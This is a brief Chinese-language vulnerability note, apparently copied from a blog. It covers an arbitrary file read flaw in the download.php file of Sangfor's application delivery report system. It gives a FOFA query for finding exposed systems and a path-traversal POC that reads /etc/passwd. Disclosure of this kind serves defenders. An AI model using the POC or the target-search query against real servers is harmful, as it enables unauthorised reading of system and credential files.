深信服应用交付报表任意文件读取漏洞

深信服应用交付报表任意文件读取漏洞
1.深信服应用交付报表任意文件读取漏洞
1.1.漏洞描述
1.2.漏洞影响
1.3.FOFA
2.漏洞复现
2.1.登录页面
2.2.POC
1.深信服应用交付报表任意文件读取漏洞
1.1.漏洞描述
  深信服应用交付报表系统 download.PHP文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件。

漏洞影响
  深信服应用交付报表系统

FOFA
  app=“SANGFOR-应用交付报表系统”

漏洞复现
2.1.登录页面

2.2.POC

  这里通过抓包进行文件读取，当然也可以在页面中直接进行获取。

POC：/report/download.php?pdf=../../../../../etc/passwd

来源地址：https://blog.csdn.net/pingan233/article/details/129436167